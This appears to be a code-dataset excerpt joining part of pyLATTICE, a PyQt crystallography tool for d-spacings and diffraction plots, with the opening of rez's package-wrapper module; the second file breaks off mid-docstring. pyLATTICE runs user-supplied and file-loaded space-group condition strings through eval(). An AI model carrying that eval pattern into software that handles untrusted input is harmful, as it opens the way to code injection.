self.comboBox_spacegroup.addItems(self.sgnumlist)
#QtCore.QObject.connect(self.comboBox_spacegroup, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.D_Spacings)
self.Recalculate()
except IndexError:
pass
def setSpaceGroups(self,geom,unit,rhomhex=False):
"""Sets the space group options based upon crystal geometry and unit cell type"""
if rhomhex:
sg = self.sghex
elif not rhomhex:
sg = self.sg
self.sgnumbers = list(sg[(sg['Geometry'] == geom) & (sg['Unit Cell'] == unit)].index)
self.sglist = list(sg.loc[self.sgnumbers,'Patterson'])
self.sgnumlist = [str(x) + ': ' + y for x,y in zip(self.sgnumbers,self.sglist)]
def SpaceGroupConditions(self,number):
"""Looks up the space-group-specific allowed diffraction spots.
number is the specific space group number to look up."""
if not self.checkBox_spacegroup.isChecked():
sg_conditions = 'True'
elif self.checkBox_spacegroup.isChecked():
#make sure number is an integer
#something is wrong with some FCC crystals
number = int(number)
unit = self.comboBox_celltype.currentText()
if unit in ['Rhombohedral, Hexagonal Axes','Hexagonal']:
sg = self.sghex
else:
sg = self.sg
sg_conditions = sg.loc[number,'SG Conditions']
return sg_conditions
def SpaceGroupLookup(self):
"""Takes input from slider/spinbox and outputs sapcegroup info into text line"""
index = self.spinBox_spacegroup.value()
c = self.sg.loc[index,'Geometry']
#u = self.sg.loc[index,'Unit Cell']
sg = self.sg.loc[index,'Patterson']
text = ': '.join([c,sg])
self.label_spacegrouplookup.setText(text)
def MetricTensor(self):
"""Calculate and show G, the metric tensor, and G*, the inverse metric tensor.
Also call function that outputs parameters into tables."""
self.G = np.zeros([3,3])
#self.G_inv
#remember, indices start at 0
#metric tensor is axially symmetric
self.a = self.doubleSpinBox_a.value()
self.b = self.doubleSpinBox_b.value()
self.c = self.doubleSpinBox_c.value()
self.G[0,0] = self.a**2
self.G[0,1] = round(self.a * self.b * np.cos(np.radians(self.spinBox_gamma.value())),6)
self.G[1,0] = self.G[0,1]
self.G[1,1] = self.b**2
self.G[0,2] = round(self.a * self.c * np.cos(np.radians(self.spinBox_beta.value())),6)
self.G[2,0] = self.G[0,2]
self.G[2,2] = self.doubleSpinBox_c.value()**2
self.G[1,2] = round(self.c * self.b * np.cos(np.radians(self.spinBox_alpha.value())),6)
self.G[2,1] = self.G[1,2]
# calc G inverse, G*
self.G_inv = np.linalg.inv(self.G)
self.Gtable.setData(self.G)
#self.Gtable.resizeColumnsToContents()
self.G_inv_table.setData(self.G_inv)
#self.G_inv_table.resizeColumnsToContents()
for i in range(0,3):
self.Gtable.setColumnWidth(i,self.Gtable_size[0]/3.35)
self.Gtable.setRowHeight(i,self.Gtable_size[1]/3.5)
self.G_inv_table.setColumnWidth(i,self.Gtable_size[0]/3.35)
self.G_inv_table.setRowHeight(i,self.Gtable_size[1]/3.5)
self.Parameters()
def Parameters(self):
"""Grabs current parameters and outputs them in tables.
Calculates reciprocal lattice parameters as well.
Must make it deal with complex numbers, but really only necessary for Triclinic..."""
self.parameters_direct = np.transpose(np.array([[self.doubleSpinBox_a.value(),self.doubleSpinBox_b.value(),self.doubleSpinBox_c.value(),self.spinBox_alpha.value(),self.spinBox_beta.value(),self.spinBox_gamma.value()]]))
self.astar = np.sqrt(self.G_inv[0,0]); self.bstar = np.sqrt(self.G_inv[1,1]); self.cstar = np.sqrt(self.G_inv[2,2])
self.gammastar = np.arccos(self.G_inv[0,1] / (self.astar * self.bstar))*180 / np.pi
self.betastar = np.arccos(self.G_inv[0,2] / (self.astar * self.cstar))*180 / np.pi
self.alphastar = np.arccos(self.G_inv[1,2] / (self.cstar * self.bstar))*180 / np.pi
self.parameters_reciprocal = np.transpose(np.array([[self.astar,self.bstar,self.cstar,self.alphastar,self.betastar,self.gammastar]]))
self.Gparam_table.setData(self.parameters_direct)
self.Gparam_inv_table.setData(self.parameters_reciprocal)
self.Gparam_table.setHorizontalHeaderLabels(['Parameters'])
self.Gparam_inv_table.setHorizontalHeaderLabels(['Parameters'])
self.Gparam_table.setVerticalHeaderLabels([u'a',u'b',u'c',u'\u03B1',u'\u03B2',u'\u03B3'])
self.Gparam_inv_table.setVerticalHeaderLabels([u'a*',u'b*',u'c*',u'\u03B1*',u'\u03B2*',u'\u03B3*'])
for i in range(0,6):
self.Gparam_table.setColumnWidth(i,self.param_table_size[0])
self.Gparam_table.setRowHeight(i,self.param_table_size[0]/6.7)
self.Gparam_inv_table.setColumnWidth(i,self.param_table_size[0])
self.Gparam_inv_table.setRowHeight(i,self.param_table_size[0]/6.7)
def D_Spacings(self):
"""Calculates D-spacings using the metric tensor and places them in a table (sorted?)"""
#grab spacegroup conditions
#multiple different spacegroup conditions. e.g. eval('h==1 or k==1') returns a True if on is satisfied
#add all conditions together into one string
#full_conditions = self.conditions + ' and ' + sg_conditions
if self.checkBox_zoneaxis.isChecked():
try:
self.u = int(self.comboBox_u.currentText())
except ValueError:
self.u = 0
try:
self.v = int(self.comboBox_v.currentText())
except ValueError:
self.v = 0
try:
self.w = int(self.comboBox_w.currentText())
except ValueError:
self.w = 0
#set "q" for rhombohedral obserse/reverse
if self.checkBox_obverse.isChecked():
q = 1
elif not self.checkBox_obverse.isChecked():
q = -1
else:
q = 0
#make pandas dataframe with multiindex h,k,l
#reinitialize dataframe
self.DSpaces = pd.DataFrame(columns = ['d-space','h','k','l'])
self.Forbidden = pd.DataFrame(columns = ['d-space','h','k','l'])
#maybe implement masking instead of loops
hmin = int(self.comboBox_hmin.currentText())
hmax = int(self.comboBox_hmax.currentText())
kmin = int(self.comboBox_kmin.currentText())
kmax = int(self.comboBox_kmax.currentText())
lmin = int(self.comboBox_lmin.currentText())
lmax = int(self.comboBox_lmax.currentText())
gen_conditions = str(self.conditions)
#needs to deal with possibility of conditional special statements, will update dspace.pyx
#first calculate all general conditions
self.DSpaces = DSpace(self.G_inv,self.u,self.v,self.w,hmin,hmax,kmin,kmax,lmin,lmax,gen_conditions,q)
#now deal with special spacegroup conditions by removing invalid spots
sg_conditions = self.SpaceGroupConditions(self.sgnumbers[self.comboBox_spacegroup.currentIndex()])
if self.manualConds != []:
if sg_conditions == 'True':
sg_conditions = ''
for c in self.manualConds:
sg_conditions += ';%s' % c
sg_conditions = sg_conditions.lstrip(';')
self.DSpaces = self.RemoveForbidden(self.DSpaces,sg_conditions)
#sort in descending Dspace order, then by h values, then k, then l...
self.DSpaces.sort(columns=['d-space','h','k','l'],ascending=False,inplace=True)
#reset indices for convenience later
self.DSpaces.index = [x for x in range(len(self.DSpaces))]
self.common.DSpaces = self.DSpaces #update DSpaces
self.dspace_table.setData(self.DSpaces)
self.dspace_table.setColumnWidth(0,80) #make d-space column a bit wider
for i in range(1,4):
self.dspace_table.setColumnWidth(i,45)
elif not self.checkBox_zoneaxis.isChecked():
pass
try:
self.updateCommon()
except AttributeError: #first go round ipython console hasn't been initialized yet
pass
def RemoveForbidden(self,d,sgconditions):
#h = d['h']; k = d['k']; l = d['l']
f = pd.DataFrame(columns = ['d-space','h','k','l'])
try:
if eval(sgconditions):
return(d)
except (KeyError,SyntaxError): #if sgconditions not 'True'
#d[(h==k) & ~(l%2==0)]
#d = d.drop(r.index)
#split multiple conditions up
conds = sgconditions.split(';')
for c in conds: #these should be if:then statements, so remove the if:~thens
c = c.strip()
if not c.startswith('if'):
r = d[eval(c)]
d = d.drop(r.index)
else:
c = c.lstrip('if').strip()
iff, then = c.split(':') #eval doesnt care about spaces
#needed for eval
h = d.h; k = d.k; l = d.l
r = d[eval('(' + iff + ')& ~(' + then + ')')]
d = d.drop(r.index)
f = pd.concat([f,r])
f.sort(columns=['d-space','h','k','l'],ascending=False,inplace=True)
f.index = [x for x in range(len(f))]
self.common.Forbidden = f
self.Forbidden = self.common.Forbidden
return(d)
def setMineralList(self):
self.comboBox_mineraldb.clear()
self.minlist = list(self.mineraldb['Chemical'] + ': ' + self.mineraldb['Name'])
self.comboBox_mineraldb.addItems(self.minlist)
def removeMinerals(self):
QtCore.QObject.disconnect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
mindiag = MineralListDialog()
model = QtGui.QStandardItemModel(mindiag.listView)
#mindiag.buttonBox.accepted.connect(mindiag.accept)
#mindiag.buttonBox.rejected.connect(mindiag.reject)
for mineral in self.minlist[1:]:
item = QtGui.QStandardItem(mineral)
item.setCheckable(True)
item.setEditable(False)
model.appendRow(item)
mindiag.listView.setModel(model)
if mindiag.exec_():
i=1
l=[]
while model.item(i):
if model.item(i).checkState():
l.append(i)
i += 1
self.mineraldb = self.mineraldb.drop(self.mineraldb.index[l])
self.mineraldb.index = list(range(len(self.mineraldb)))
self.setMineralList()
QtCore.QObject.connect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
def AppendMineral(self):
QtCore.QObject.disconnect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
dial = NewMineralDialog()
if dial.exec_():
name = dial.lineEdit_name.text()
sym = dial.lineEdit_sym.text()
if name == '':
name = 'Mineral'
if sym == '':
sym = 'XX'
#set special conditions to a bunch of strings or as a NaN
if self.manualConds == []:
SCs = np.nan
else:
SCs = ';'.join(self.manualConds)
params = {'Name':name, 'Chemical':sym,
'Crystal':self.comboBox_crystaltype.currentText(),
'UnitCell':self.comboBox_celltype.currentText(),
'SpaceGroup':int(self.comboBox_spacegroup.currentText().split(':')[0]),
'a':self.doubleSpinBox_a.value(),
'b':self.doubleSpinBox_b.value(),
'c':self.doubleSpinBox_c.value(),
'SpecialConditions':SCs}
self.mineraldb = self.mineraldb.append(params,ignore_index=True)
self.setMineralList()
QtCore.QObject.connect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
def setSettings(self):
"""Raise SettingsDialog and pass values to pyLATTICE parameters.
Grab current settings first."""
current = {'a max':self.doubleSpinBox_a.maximum(),
'b max':self.doubleSpinBox_b.maximum(),
'c max':self.doubleSpinBox_c.maximum()}
dial = SettingsDialog(current)
if dial.exec_():
amax = dial.maxa.value()
bmax = dial.maxb.value()
cmax = dial.maxc.value()
#set slider and spinbox maxima
self.doubleSpinBox_a.setMaximum(amax)
self.doubleSpinBox_b.setMaximum(bmax)
self.doubleSpinBox_c.setMaximum(cmax)
self.hSlider_a.setMaximum(int(10*amax))
self.hSlider_b.setMaximum(int(10*bmax))
self.hSlider_c.setMaximum(int(10*cmax))
def ManualConditions(self):
"""Raise the manual space group conditions dialog"""
dial = ManualConditionsDialog(conditions= self.manualConds)
if dial.exec_():
num = dial.manualCondList.count()
self.manualConds = [dial.manualCondList.item(i).text() for i in range(num)]
def SaveDSpace(self):
self.Save(self.DSpaces)
def SaveMineralDB(self):
self.Save(self.mineraldb)
def LoadMineralDB(self):
QtCore.QObject.disconnect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
ftypes = 'HDF (*.h5);;CSV (*.csv);;Excel (*.xlsx)'
fname,ffilter = QtGui.QFileDialog.getOpenFileNameAndFilter(self,caption='Load Mineral Database',directory=self.common.path,filter=ftypes)
fname = str(fname)
ffilter=str(ffilter)
#print(fname,ffilter)
name, ext = os.path.splitext(fname)
self.common.path = os.path.dirname(fname)
if ffilter.startswith('HDF'):
item = pd.read_hdf(name + '.h5','table')
elif ffilter.startswith('CSV'):
item = pd.read_csv(name + '.csv',sep=',')
elif ffilter.startswith('Excel'): #allow for different excel formats
sheetname,ok = QtGui.QInputDialog.getText(self,'Input Sheetname','Sheetname')
if ok and sheetname != '':
if ext == '.xlsx' or ext == '':
item = pd.read_excel(name + '.xlsx',str(sheetname))
elif ext == '.xls':
item = pd.read_excel(name + '.xls',str(sheetname))
self.mineraldb = item
else:
QtGui.QMessageBox.information(self, "Warning!", 'You must specify a sheet name!')
self.setMineralList()
QtCore.QObject.connect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
def Save(self,item):
#item should be pandas dataframe object
ftypes = 'HDF (*.h5);;CSV (*.csv);;Excel (*.xlsx)'
fname,ffilter = QtGui.QFileDialog.getSaveFileNameAndFilter(self,caption='Save D-Spacings',directory=self.common.path,filter=ftypes)
fname = str(fname)
ffilter=str(ffilter)
#print(fname,ffilter)
name, ext = os.path.splitext(fname)
self.common.path = os.path.dirname(fname)
print(name + ext)
if ffilter.startswith('HDF'):
item.to_hdf(name + '.h5','table')
elif ffilter.startswith('CSV'):
item.to_csv(name + '.csv',sep=',')
elif ffilter.startswith('Excel'): #allow for different excel formats
if ext == '.xlsx' or ext == '':
item.to_excel(name + '.xlsx')
elif ext == '.xls':
item.to_excel(name + '.xls')
################################################################################
############################### Plotting #######################################
################################################################################
def PlotDiffraction(self):
"""Plots the current list of spots and d-spacings.
For each point in self.DSpaces [d-space,h,k,l], determines anlges for plotting."""
#initialize plot with center spot only
self.Plot.clear()
self.common._x2 = False
self.Plot.set_xlabel(u'Distance (\u212B\u207B\u00B9)')#angstrom^-1
self.Plot.set_ylabel(u'Distance (\u212B\u207B\u00B9)')
#get values in energy, cam legnth, cam const. combo boxes
self.energy = self.spinBox_beamenergy.value()
self.camlength = self.spinBox_camlength.value()
self.camconst = self.doubleSpinBox_camconst.value()
#self.Plot.plot(0,0, linestyle = '', marker='o', markersize = 10, color = 'black',picker=5, label = u'0 0 0')
#add some labels
if self.checkBox_labels.isChecked() == True:
#center spot
#self.Plot.annotate(u'0 0 0', xy = (0,0), xytext=(0,10),textcoords = 'offset points', ha = 'center', va = 'bottom',
# bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.01))
#add crystal structure information in an annotation
#grab current values
self.a = self.doubleSpinBox_a.value(); self.b = self.doubleSpinBox_b.value(); self.c = self.doubleSpinBox_c.value()
alph = self.spinBox_alpha.value(); beta = self.spinBox_beta.value(); gam = self.spinBox_gamma.value()
plot_label = r'''%s: %s; a = %.2f, b = %.2f, c = %.2f; $\alpha$ = %d$^o$, $\beta$ = %d$^o$, $\gamma$ = %d$^o$''' % (self.comboBox_crystaltype.currentText(),self.comboBox_celltype.currentText(),self.a,self.b,self.c,alph,beta,gam)
ann = self.Plot.annotate(plot_label, xy=(0.02, 1.02), xycoords='axes fraction',bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.01))
ann.draggable() #make annotation draggable
#need to choose a reference point with smallest sum of absolute miller indices
#since self.DSpaces is sorted with largest d-space first, this will be the smallest sum of abs miller indices
#first point
rotation = np.radians(float(self.comboBox_rotate.currentText()))
d = np.array(self.DSpaces['d-space'],dtype=np.float)
ref = np.array(self.DSpaces.loc[0,['h','k','l']],dtype=np.int)
Q2 = np.array(self.DSpaces[['h','k','l']],dtype=np.int)
recip_vec = np.array([self.astar,self.bstar,self.cstar],dtype=np.float)
dir_vec = np.array([self.u,self.v,self.w],dtype=np.int)
#add extra factor if hcp unit cell
t = self.comboBox_crystaltype.currentText()
#must check that Forbidden dataframe isn't empty for a spcific zone axis
showf = self.checkBox_showforbidden.isChecked() and not self.Forbidden.empty
if t in ['Hexagonal','Trigonal']:
#print('Hexagonal')
#change dtypes
ref = np.array(ref,dtype=np.float)
Q2 = np.array(Q2,dtype=np.float)
lam = np.sqrt(2/3)*(self.c/self.a)
ref[2] = ref[2]/lam
ref = np.hstack([ref,-(ref[0]+ref[1])]) #add i direction, but to the end b/c it doesnt matter
Q2[:,2] = Q2[:,2]/lam
Q2 = np.append(Q2,np.array([-Q2[:,0]-Q2[:,1]]).T,axis=1)
theta,x,y = CalcSpotsHCP(d,Q2,ref,recip_vec,dir_vec,rotation)
if showf:
df = np.array(self.Forbidden['d-space'],dtype=np.float)
Q2f = np.array(self.Forbidden[['h','k','l']],dtype=np.int)
Q2f = np.array(Q2f,dtype=np.float)
Q2f[:,2] = Q2f[:,2]/lam
Q2f = np.append(Q2f,np.array([-Q2f[:,0]-Q2f[:,1]]).T,axis=1)
thetaf,xf,yf = CalcSpotsHCP(df,Q2f,ref,recip_vec,dir_vec,rotation)
else:
theta,x,y = CalcSpots(d,Q2,ref,recip_vec,self.G_inv,dir_vec,rotation)
if showf:
df = np.array(self.Forbidden['d-space'],dtype=np.float)
Q2f = np.array(self.Forbidden[['h','k','l']],dtype=np.int)
thetaf,xf,yf = CalcSpots(df,Q2f,ref,recip_vec,self.G_inv,dir_vec,rotation)
self.DSpaces['theta'] = np.degrees(theta).round(2); self.DSpaces['x'] = x; self.DSpaces['y'] = y
if showf:
self.Forbidden['theta'] = np.degrees(thetaf).round(2); self.Forbidden['x'] = xf; self.Forbidden['y'] = yf
for i in range(len(self.Forbidden)):
label = ' '.join([str(int(x)) for x in self.Forbidden.loc[i,['h','k','l']]]) #this is a bit dense, but makes a list of str() hkl values, then concatenates
#convert negative numbers to overline numbers for visual effect
for j,num in enumerate(self._overline_strings):
match = re.search(u'-%d' % (j+1),label)
if match:
label = re.sub(match.group(),num,label)
#add each label and coordinate to DSpace dataframe
# self.DSpaces.loc[i,'x'] = coords[0]
# self.DSpaces.loc[i,'y'] = coords[1]
self.Forbidden.loc[i,'label'] = label
#print(self.DSpaces)
#make label for each spot
for i in range(len(self.DSpaces)):
label = r' '.join([str(int(x)) for x in self.DSpaces.loc[i,['h','k','l']]]) #this is a bit dense, but makes a list of str() hkl values, then concatenates
#convert negative numbers to overline numbers for visual effect
for j,num in enumerate(self._overline_strings):
match = re.search(u'-%d' % (j+1),label)
if match:
label = re.sub(match.group(),num,label)
#add each label and coordinate to DSpace dataframe
# self.DSpaces.loc[i,'x'] = coords[0]
# self.DSpaces.loc[i,'y'] = coords[1]
label = r'$%s$' % label.replace(' ','\ ') #convert to mathtex string and add spaces
self.DSpaces.loc[i,'label'] = label
#add 000 spot
self.DSpaces.loc[len(self.DSpaces),['d-space','h','k','l','x','y','label']] = [0,0,0,0,0,0,r'$0\ 0\ 0$']
#print(self.DSpaces)
#scatterplots make it difficult to get data back in matplotlibwidget
# for i in range(len(self.DSpaces)):
self.Plot.plot(self.DSpaces['x'],self.DSpaces['y'],ls='',marker='o',markersize=10,color='k',picker=5)#,label='%i %i %i' % (self.DSpaces.loc[i,['h']],self.DSpaces.loc[i,['k']],self.DSpaces.loc[i,['l']]))
if showf:
self.Plot.plot(self.Forbidden['x'],self.Forbidden['y'],ls='',marker='o',markersize=7,color='gray', alpha=.7)
#xmax = max(self.DSpaces['x']); xmin = min(self.DSpaces['x'])
#ymax = max(self.DSpaces['y']); ymin = min(self.DSpaces['y'])
#self.Plot.set_xlim([1.5*xmin,1.5*xmax])
#self.Plot.set_ylim([1.5*ymin,1.5*ymax])
if self.checkBox_labels.isChecked() == True:
for i in range(len(self.DSpaces)):
#label = self.MathLabels(i)
label = self.DSpaces.loc[i,'label']
self.Plot.annotate(label, xy = (self.DSpaces.loc[i,'x'],self.DSpaces.loc[i,'y']), xytext=(0,10),textcoords = 'offset points', ha = 'center', va = 'bottom',
bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.01))
if showf:
for i in range(len(self.Forbidden)):
#label = self.MathLabels(i)
label = self.Forbidden.loc[i,'label']
self.Plot.annotate(label, xy = (self.Forbidden.loc[i,'x'],self.Forbidden.loc[i,'y']), xytext=(0,10),textcoords = 'offset points', ha = 'center', va = 'bottom',color='gray',
bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.01))
if showf:
self.common.Forbidden = self.Forbidden
self.common.DSpaces = self.DSpaces
self.common.a = self.doubleSpinBox_a.value()#for determining arrow size in plot
self.DiffWidget.canvas.draw()
def MathLabels(self,i):
'''Make labels with overlines instead of minus signs for plotting with matplotlib.
i is the index for DSpaces'''
label = r''
if self.DSpaces.loc[i,'h'] < 0:
label+=r'$\bar %i$ ' % abs(self.DSpaces.loc[i,'h'])
else:
label+=r'%i ' % self.DSpaces.loc[i,'h']
if self.DSpaces.loc[i,'k'] < 0:
label+=r'$\bar %i$ ' % abs(self.DSpaces.loc[i,'k'])
else:
label+=r'%i ' % self.DSpaces.loc[i,'k']
if self.DSpaces.loc[i,'l'] < 0:
label+=r'$\bar %i$' % abs(self.DSpaces.loc[i,'l'])
else:
label+=r'%i' % self.DSpaces.loc[i,'l']
return(label)
################################################################################
############################### Calculator #####################################
################################################################################
def Calculator(self):
"""Grabs current miller indices or zone directions and calls AngleCalc"""
h1 = int(self.comboBox_h1.currentText())
h2 = int(self.comboBox_h2.currentText())
k1 = int(self.comboBox_k1.currentText())
k2 = int(self.comboBox_k2.currentText())
l1 = int(self.comboBox_l1.currentText())
l2 = int(self.comboBox_l2.currentText())
i1 = -(h1+k1)
i2 = -(h2+k2)
hex = self.checkBox_hexagonal.isChecked()
angle = round(np.degrees(self.Diffraction.PlaneAngle(p1=np.array([h1,k1,l1]),p2=np.array([h2,k2,l2]),hex=hex)),2)
if np.isnan(angle):
QtGui.QMessageBox.information(self, "Uh, Oh!", 'There is no [0 0 0] direction/plane!')
else:
if self.checkBox_normals.isChecked():
self.lineEdit_angle.setText(u'φ = %.2f°' % angle)
bra = u'('
ket = u')'
elif not self.checkBox_normals.isChecked():
self.lineEdit_angle.setText(u'ρ = %.2f°' % angle)
bra = u'['
ket = u']'
if hex == False:
hkls = [bra,h1,k1,l1,ket,bra,h2,k2,l2,ket]
for j,it in enumerate(hkls):
if type(it) == int and it < 0:
hkls[j] = self._overline_strings[abs(it)-1]
self.lineEdit_dirs.setText(u'%s%s%s%s%s \u2220 %s%s%s%s%s' % tuple(hkls))
else:
hkls = [bra,h1,k1,i1,l1,ket,bra,h2,k2,i2,l2,ket]
for j,it in enumerate(hkls):
if type(it) == int and it < 0:
hkls[j] = self._overline_strings[abs(it)-1]
self.lineEdit_dirs.setText(u'%s%s%s%s%s%s \u2220 %s%s%s%s%s%s' % tuple(hkls))
def CalcLabels(self):
"""Rewrite labels for aesthetics"""
if self.checkBox_normals.isChecked():
self.label_h2.setText(u'h')
self.label_k2.setText(u'k')
self.label_l2.setText(u'l')
#self.label_h2.setAlignment(0x0004)
#self.label_k2.setAlignment(0x0004)
#self.label_l2.setAlignment(0x0004)
elif not self.checkBox_normals.isChecked():
self.label_h2.setText(u'u')
self.label_k2.setText(u'v')
self.label_l2.setText(u'w')
#self.label_h2.setAlignment(0x0004)
#self.label_k2.setAlignment(0x0004)
#self.label_l2.setAlignment(0x0004)
################################################################################
############################### Other ##########################################
################################################################################
def About(self):
"""Displays the About message"""
QtGui.QMessageBox.information(self, "About",
"""pyLATTICE %s:
Written by Evan Groopman
Based upon LATTICE (DOS) by Thomas Bernatowicz
c. 2011-2014
For help contact: eegroopm@gmail.com""" % self.version)
def HowTo(self):
"""How-to dialog box"""
howtomessage = (
"""
- Select crystal type, unit cell type, and lattice parameters to calculate the metric tensor.
- OR select a mineral from the database.
- D-spacings will be calculated between the selected Miller indices.
- Select zone axis and press "Plot" to show diffraction pattern.
- Select two diffraction spots to measure distance and angle.
Note: pyLATTICE only includes general reflection conditions for each space group. It does not includes special conditions based upon multiplcity, site symmetry, etc. EXCEPT for FCC diamond #227.
""")
QtGui.QMessageBox.information(self, "How to use",
howtomessage)
| gpl-2.0 | -595,474,331,354,563,100 | 53.072646 | 240 | 0.610114 | false |
rsjohnco/rez | src/rez/packages_.py | 1 | 19212 | from rez.package_repository import package_repository_manager
from rez.package_resources_ import PackageFamilyResource, PackageResource, \
VariantResource, package_family_schema, package_schema, variant_schema, \
package_release_keys
from rez.package_serialise import dump_package_data
from rez.utils.data_utils import cached_property
from rez.utils.formatting import StringFormatMixin, StringFormatType
from rez.utils.filesystem import is_subdirectory
from rez.utils.schema import schema_keys
from rez.utils.resources import ResourceHandle, ResourceWrapper
from rez.exceptions import PackageMetadataError, PackageFamilyNotFoundError
from rez.vendor.version.version import VersionRange
from rez.vendor.version.requirement import VersionedObject
from rez.serialise import load_from_file, FileFormat
from rez.config import config
from rez.system import system
import os.path
import sys
#------------------------------------------------------------------------------
# package-related classes
#------------------------------------------------------------------------------
class PackageRepositoryResourceWrapper(ResourceWrapper, StringFormatMixin):
format_expand = StringFormatType.unchanged
def validated_data(self):
data = ResourceWrapper.validated_data(self)
data = dict((k, v) for k, v in data.iteritems() if v is not None)
return data
class PackageFamily(PackageRepositoryResourceWrapper):
"""A package family.
Note:
Do not instantiate this class directly, instead use the function
`iter_package_families`.
"""
keys = schema_keys(package_family_schema)
def __init__(self, resource):
assert isinstance(resource, PackageFamilyResource)
super(PackageFamily, self).__init__(resource)
def iter_packages(self):
"""Iterate over the packages within this family, in no particular order.
Returns:
`Package` iterator.
"""
repo = self.resource._repository
for package in repo.iter_packages(self.resource):
yield Package(package)
class PackageBaseResourceWrapper(PackageRepositoryResourceWrapper):
"""Abstract base class for `Package` and `Variant`.
"""
@property
def uri(self):
return self.resource.uri
@property
def config(self):
"""Returns the config for this package.
Defaults to global config if this package did not provide a 'config'
section.
"""
return self.resource.config or config
@cached_property
def is_local(self):
"""Returns True if the package is in the local package repository"""
local_repo = package_repository_manager.get_repository(
self.config.local_packages_path)
return (self.resource._repository.uid == local_repo.uid)
def print_info(self, buf=None, format_=FileFormat.yaml,
skip_attributes=None, include_release=False):
"""Print the contents of the package.
Args:
buf (file-like object): Stream to write to.
format_ (`FileFormat`): Format to write in.
skip_attributes (list of str): List of attributes to not print.
include_release (bool): If True, include release-related attributes,
such as 'timestamp' and 'changelog'
"""
data = self.validated_data().copy()
# config is a special case. We only really want to show any config settings
# that were in the package.py, not the entire Config contents that get
# grafted onto the Package/Variant instance. However Variant has an empy
# 'data' dict property, since it forwards data from its parent package.
data.pop("config", None)
if self.config:
if isinstance(self, Package):
config_dict = self.data.get("config")
else:
config_dict = self.parent.data.get("config")
data["config"] = config_dict
if not include_release:
skip_attributes = list(skip_attributes or []) + list(package_release_keys)
buf = buf or sys.stdout
dump_package_data(data, buf=buf, format_=format_,
skip_attributes=skip_attributes)
class Package(PackageBaseResourceWrapper):
"""A package.
Note:
Do not instantiate this class directly, instead use the function
`iter_packages` or `PackageFamily.iter_packages`.
"""
keys = schema_keys(package_schema)
def __init__(self, resource):
assert isinstance(resource, PackageResource)
super(Package, self).__init__(resource)
@cached_property
def qualified_name(self):
"""Get the qualified name of the package.
Returns:
str: Name of the package with version, eg "maya-2016.1".
"""
o = VersionedObject.construct(self.name, self.version)
return str(o)
@cached_property
def parent(self):
"""Get the parent package family.
Returns:
`PackageFamily`.
"""
repo = self.resource._repository
family = repo.get_parent_package_family(self.resource)
return PackageFamily(family) if family else None
@cached_property
def num_variants(self):
return len(self.data.get("variants", []))
def iter_variants(self):
"""Iterate over the variants within this package, in index order.
Returns:
`Variant` iterator.
"""
repo = self.resource._repository
for variant in repo.iter_variants(self.resource):
yield Variant(variant)
def get_variant(self, index=None):
"""Get the variant with the associated index.
Returns:
`Variant` object, or None if no variant with the given index exists.
"""
for variant in self.iter_variants():
if variant.index == index:
return variant
class Variant(PackageBaseResourceWrapper):
"""A package variant.
Note:
Do not instantiate this class directly, instead use the function
`Package.iter_variants`.
"""
keys = schema_keys(variant_schema)
keys.update(["index", "root", "subpath"])
def __init__(self, resource):
assert isinstance(resource, VariantResource)
super(Variant, self).__init__(resource)
@cached_property
def qualified_package_name(self):
o = VersionedObject.construct(self.name, self.version)
return str(o)
@cached_property
def qualified_name(self):
"""Get the qualified name of the variant.
Returns:
str: Name of the variant with version and index, eg "maya-2016.1[1]".
"""
idxstr = '' if self.index is None else str(self.index)
return "%s[%s]" % (self.qualified_package_name, idxstr)
@cached_property
def parent(self):
"""Get the parent package.
Returns:
`Package`.
"""
repo = self.resource._repository
package = repo.get_parent_package(self.resource)
return Package(package)
def get_requires(self, build_requires=False, private_build_requires=False):
"""Get the requirements of the variant.
Args:
build_requires (bool): If True, include build requirements.
private_build_requires (bool): If True, include private build
requirements.
Returns:
List of `Requirement` objects.
"""
requires = self.requires or []
if build_requires:
requires = requires + (self.build_requires or [])
if private_build_requires:
requires = requires + (self.private_build_requires or [])
return requires
def install(self, path, dry_run=False, overrides=None):
"""Install this variant into another package repository.
If the package already exists, this variant will be correctly merged
into the package. If the variant already exists in this package, the
existing variant is returned.
Args:
path (str): Path to destination package repository.
dry_run (bool): If True, do not actually install the variant. In this
mode, a `Variant` instance is only returned if the equivalent
variant already exists in this repository; otherwise, None is
returned.
overrides (dict): Use this to change or add attributes to the
installed variant.
Returns:
`Variant` object - the (existing or newly created) variant in the
specified repository. If `dry_run` is True, None may be returned.
"""
repo = package_repository_manager.get_repository(path)
resource = repo.install_variant(self.resource,
dry_run=dry_run,
overrides=overrides)
if resource is None:
return None
elif resource is self.resource:
return self
else:
return Variant(resource)
class PackageSearchPath(object):
"""A list of package repositories.
For example, $REZ_PACKAGES_PATH refers to a list of repositories.
"""
def __init__(self, packages_path):
"""Create a package repository list.
Args:
packages_path (list of str): List of package repositories.
"""
self.paths = packages_path
def iter_packages(self, name, range_=None):
"""See `iter_packages`.
Returns:
`Package` iterator.
"""
for package in iter_packages(name=name, range_=range_, paths=self.paths):
yield package
def __contains__(self, package):
"""See if a package is in this list of repositories.
Note:
This does not verify the existance of the resource, only that the
resource's repository is in this list.
Args:
package (`Package` or `Variant`): Package to search for.
Returns:
bool: True if the resource is in the list of repositories, False
otherwise.
"""
return (package.resource._repository.uid in self._repository_uids)
@cached_property
def _repository_uids(self):
uids = set()
for path in self.paths:
repo = package_repository_manager.get_repository(path)
uids.add(repo.uid)
return uids
#------------------------------------------------------------------------------
# resource acquisition functions
#------------------------------------------------------------------------------
def iter_package_families(paths=None):
"""Iterate over package families, in no particular order.
Note that multiple package families with the same name can be returned.
Unlike packages, families later in the searchpath are not hidden by earlier
families.
Args:
